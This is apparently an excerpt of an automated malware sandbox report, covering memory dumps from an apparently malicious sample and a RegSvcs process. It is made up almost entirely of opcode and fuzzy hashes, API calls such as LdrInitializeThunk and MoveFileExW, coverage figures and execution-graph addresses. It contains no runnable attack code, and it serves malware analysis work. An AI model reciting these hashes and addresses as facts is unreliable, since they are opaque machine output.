                                                • Instruction ID: 5f7cecbcd5a30d90be649da092a8756a92386902b05c941af4ed45e8d68585ac
                                                • Opcode Fuzzy Hash: b51e50f701ee58ccd11574d637a2d672da2115fefa42afa354f5a41a878d4bc8
                                                • Instruction Fuzzy Hash: 0F11F5B58003489FDB20DF9AD449BDEBBF8FB48324F108459E559A3610C379A944CFA5
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0150C366
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 217c4c728dcace9254fd50a90f427008b5da26d4a54f82cf8d48f9bbfead4010
                                                • Instruction ID: 7fa1c68f779e456aa2a90751fe5f1b692324f37b127caab333636f7a1485504b
                                                • Opcode Fuzzy Hash: 217c4c728dcace9254fd50a90f427008b5da26d4a54f82cf8d48f9bbfead4010
                                                • Instruction Fuzzy Hash: 0D110FB5C003498FDB20DF9AD444ADEFBF4BB89220F10855AD928B7250C379A645CFA1
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0B03031D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2233822959.000000000B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B030000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_b030000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: b940151e82d82dace5a7f7e0214b4b1bd45e87fc3eb998802b659bced70a96c2
                                                • Instruction ID: 9d96d7b47dbd44cdff066b7b3da0e7c98b13f8a9b072fe2c46c2b88a5c95613e
                                                • Opcode Fuzzy Hash: b940151e82d82dace5a7f7e0214b4b1bd45e87fc3eb998802b659bced70a96c2
                                                • Instruction Fuzzy Hash: B71103B58003489FCB10DF9AD488BDEBBF8FB48320F108459E558A3210C379A544CFA5
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 85b888098b10bf734136164fde11c8d01e30071c36d92b25e4383c399abab7e9
                                                • Instruction ID: ee5111c034b738502a1a3f153adc12a5eebc0c7251001b26bdf3c546c51bb811
                                                • Opcode Fuzzy Hash: 85b888098b10bf734136164fde11c8d01e30071c36d92b25e4383c399abab7e9
                                                • Instruction Fuzzy Hash: E5210672904200DFDB06DF98D9C4B27BF65FB98320F61C56AE9090B766C33AD416CBA1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd0b946104bda7532295b9b3a3585380df2e4cf96f7f29fd52d20523efe5fa66
                                                • Instruction ID: d133a2fe3bdd46ad0c96ee0769cc256d040526a96c91253f20f5ed8ae2a6373d
                                                • Opcode Fuzzy Hash: bd0b946104bda7532295b9b3a3585380df2e4cf96f7f29fd52d20523efe5fa66
                                                • Instruction Fuzzy Hash: 312125759042809FDB09DF98D5C0B16BF65FB88328F20C5AED8090B366C33AD806CAB1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ea71467d2afd550f7cd1e4a944f08b04f411be8e590049f9dbf51a3f3995c68
                                                • Instruction ID: 13b224f7cbc13fcda7f1212341efd8c48315205255c71b93c50648c11c209c87
                                                • Opcode Fuzzy Hash: 6ea71467d2afd550f7cd1e4a944f08b04f411be8e590049f9dbf51a3f3995c68
                                                • Instruction Fuzzy Hash: A72103B1904200DFCB15DF68D9C0B16BF65EB8831CF20C5AAD90A0B366C33AD407CA71
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1584cfd287e3337ca828b27539bedc01eb4dd2dcb665e9626375e52a316e5223
                                                • Instruction ID: 930f4679844660b9ee82400902b799ce5ed27ca57563c1b7958e3e942dd9ae88
                                                • Opcode Fuzzy Hash: 1584cfd287e3337ca828b27539bedc01eb4dd2dcb665e9626375e52a316e5223
                                                • Instruction Fuzzy Hash: 232180755093808FDB03CF24D5D4716BF71EB46218F28C5DBD8498B2A7C33A980ACB62
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                                • Instruction ID: c71e4c9e31e5646eb08929197838c29f0bf7b9070a9d50deefdb92898371a5a9
                                                • Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                                • Instruction Fuzzy Hash: FE21A276904240DFDB06CF54D9C4B16BF71FB94324F24C5AADD450B666C336D416CBA1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction ID: 0bdbb100861834c49ca01a30e881f37f6fa1ac19438dc74a8735c05f11328b63
                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction Fuzzy Hash: 6811D075904280CFDB06CF54D5C4B16BF61FB44328F24C6AAD8494B366C33AD40ACBA1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d476b15d8b490cea7c019ed1c214b6c4f5989d5ed78e40f59b48d9f352f44ddf
                                                • Instruction ID: 2953e31cfeadaa4b9104c59215144ca3e0ab1276f59d7940218d9d704070b3ac
                                                • Opcode Fuzzy Hash: d476b15d8b490cea7c019ed1c214b6c4f5989d5ed78e40f59b48d9f352f44ddf
                                                • Instruction Fuzzy Hash: 45012079404384D9E7144A99CD84B57FF9CEF65320F58C427ED090A766C3799441C671
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf469ae3690b38cb82af795570f5e22d349c77a6b6c628281b1d7f17c7bb86c6
                                                • Instruction ID: ec8fbc9931993603a931ae5ba6d96c52bba39c10bec89914879eb2ff714ae5cd
                                                • Opcode Fuzzy Hash: cf469ae3690b38cb82af795570f5e22d349c77a6b6c628281b1d7f17c7bb86c6
                                                • Instruction Fuzzy Hash: 7BF0F675404384DEE7248A0ADC84B63FFA8EF61734F58C45BED090B396C3799840CAB0

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:8.6%
                                                Total number of Nodes:35
                                                Total number of Limit Nodes:4
                                                execution_graph 18772 563cd03 18774 563cbc7 18772->18774 18773 563ccab 18774->18773 18779 563ce20 18774->18779 18783 563cfbc 18774->18783 18787 563cf5c 18774->18787 18791 563ce10 18774->18791 18780 563ce48 LdrInitializeThunk 18779->18780 18782 563ce7e 18780->18782 18782->18773 18784 563cf3b 18783->18784 18786 563ce7e 18783->18786 18785 563ce71 LdrInitializeThunk 18784->18785 18784->18786 18785->18786 18786->18773 18788 563cf3b 18787->18788 18789 563ce71 LdrInitializeThunk 18788->18789 18790 563ce7e 18788->18790 18789->18790 18790->18773 18792 563ce48 LdrInitializeThunk 18791->18792 18794 563ce7e 18792->18794 18794->18773 18795 563a0d0 18796 563a0fd 18795->18796 18798 563bfdf 18796->18798 18800 563a406 18796->18800 18801 5639788 18796->18801 18799 5639788 LdrInitializeThunk 18799->18800 18800->18798 18800->18799 18802 563979a 18801->18802 18804 563979f 18801->18804 18802->18800 18803 5639ec9 LdrInitializeThunk 18803->18802 18804->18802 18804->18803 18805 101f138 18806 101f142 18805->18806 18807 101f167 MoveFileExW 18805->18807 18809 101f2c7 18807->18809 18810 5639d8c 18815 5639c43 18810->18815 18812 5639ee1 18813 5639d84 LdrInitializeThunk 18813->18812 18814 5639788 LdrInitializeThunk 18814->18815 18815->18813 18815->18814
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e90dfc3bf2beea67f0a48aff90f5a6089b608bcf23138458425256731413cb8
                                                • Instruction ID: dd1582fa3bdcb9dafad4fc75043ccf730bb8ad3bb429fa9451bfaa8bc124e480
                                                • Opcode Fuzzy Hash: 5e90dfc3bf2beea67f0a48aff90f5a6089b608bcf23138458425256731413cb8
                                                • Instruction Fuzzy Hash: 85F1D374E01218CFDB14DFA9D884B9DBBB2BF88304F54C1A9E808AB355DB74A985CF50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6378f967afb2039cfe549632d6668b893d92ec86ebf7f3f71efdd269bdd83519
                                                • Instruction ID: 2fec72a2eb954b0a51b5238a95051a5a5274cf5d11df8e76284a1bbee1ef2aa8
                                                • Opcode Fuzzy Hash: 6378f967afb2039cfe549632d6668b893d92ec86ebf7f3f71efdd269bdd83519
                                                • Instruction Fuzzy Hash: 604148B0D04209DBDB04CF99D585ADDFBB2BF88314F24C169E4096B385C731A98ACB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1526 101f138-101f140 1527 101f142-101f144 1526->1527 1528 101f167-101f23f 1526->1528 1529 101f146-101f148 1527->1529 1530 101f14a-101f150 1527->1530 1544 101f241-101f250 1528->1544 1545 101f253-101f25e 1528->1545 1529->1530 1531 101f152-101f155 1529->1531 1532 101f163-101f166 1530->1532 1534 101f157-101f159 1531->1534 1535 101f15b-101f15c 1531->1535 1534->1532 1535->1532 1544->1545 1546 101f260-101f26f 1545->1546 1547 101f272-101f2c5 MoveFileExW 1545->1547 1546->1547 1548 101f2c7-101f2cd 1547->1548 1549 101f2ce-101f30c 1547->1549 1548->1549
                                                APIs
                                                • MoveFileExW.KERNELBASE(?,?,?,?), ref: 0101F2B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3289212682.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_1010000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID: Hnq
                                                • API String ID: 3562171763-2896580000
                                                • Opcode ID: 20f58ce9c6b0663f25fe2481c633f6f50e0263997e48786562357bb87f5689d6
                                                • Instruction ID: f366ffa2abbbf4c495a22e99255964963d78cd1a94ae7db1a1ef1d3943ab05a0
                                                • Opcode Fuzzy Hash: 20f58ce9c6b0663f25fe2481c633f6f50e0263997e48786562357bb87f5689d6
                                                • Instruction Fuzzy Hash: 2651F574E04249DFDB04DFA9D984ADEBBF2FF49300F14806AE449AB355D738A946CB50
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c17e15510d0f570b7611fa38e54ebd8be5fa123909879bd2f06ac9d114c14d9
                                                • Instruction ID: 68822638826f91a09ead33b85ec73461874622d375355c375ffff67b3138ba0f
                                                • Opcode Fuzzy Hash: 5c17e15510d0f570b7611fa38e54ebd8be5fa123909879bd2f06ac9d114c14d9
                                                • Instruction Fuzzy Hash: B0413774A04109DBDB04DF98D485AECBBB2FF49350F649159E40AAB381C735AD87CF50
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 985904781e7cb34dd95947a65deb053e77671061316f3cb174854950c5876417
                                                • Instruction ID: 81903b3ebaadfae6234a3381b3f05024a49cba881e2e56f4da5b386ce3c9c57f
                                                • Opcode Fuzzy Hash: 985904781e7cb34dd95947a65deb053e77671061316f3cb174854950c5876417
                                                • Instruction Fuzzy Hash: 20411274A04209DFDB04CF98D485AECBBB2FF89354F649159E80ABB381C735A986CF50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a46ca1fc8f555bab30cf5dbc594ae11af6ce14e73c71b55ac752b7a678051bc8
                                                • Instruction ID: ec6dae78b18c7c3747d6523eb8bd69db39b96be75c8a9ec74bd61a87075303f1
                                                • Opcode Fuzzy Hash: a46ca1fc8f555bab30cf5dbc594ae11af6ce14e73c71b55ac752b7a678051bc8
                                                • Instruction Fuzzy Hash: C4216A71D012099BDB18CFAAD984ADDFBF2BF88300F24952AE404B7390C730598ACB50
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 05639ECE
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7a09f1dab672439a7729979038b1bdd72bf3b4faaafaddde65e85b37b76c68ba
                                                • Instruction ID: 3e0395bbf90c66379fc8acfe64f4492b95435d8068a363d0523833ffef023867
                                                • Opcode Fuzzy Hash: 7a09f1dab672439a7729979038b1bdd72bf3b4faaafaddde65e85b37b76c68ba
                                                • Instruction Fuzzy Hash: 7D115674E041098BDB08DFA8D485EEDBBB5BF88304F54C169E804A7346DBB0E945CF20
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3288182001.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_fbd000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18410af847789ffd3dac853f98eb05f485d8ba1d6b9ac422231201bb7f33aeb6
                                                • Instruction ID: 0fd43329b02cddd6be67901578908cd2637703e408218bd6b19f9b16e528bd06
                                                • Opcode Fuzzy Hash: 18410af847789ffd3dac853f98eb05f485d8ba1d6b9ac422231201bb7f33aeb6
                                                • Instruction Fuzzy Hash: BD212271A042049FDB14EF24C9C0B26BB65FB84324F20C569E8490B25AD73AD846EF62
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.3288182001.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_fbd000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction ID: d59319e1fa09ad000934c5f00ae29062d122ce7a9b250075e93b9c8990a6488a
                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction Fuzzy Hash: 2011DD75904284CFDB12CF14C9C4B15BFA2FB84324F24C6A9D8494B256C33AD84ADF62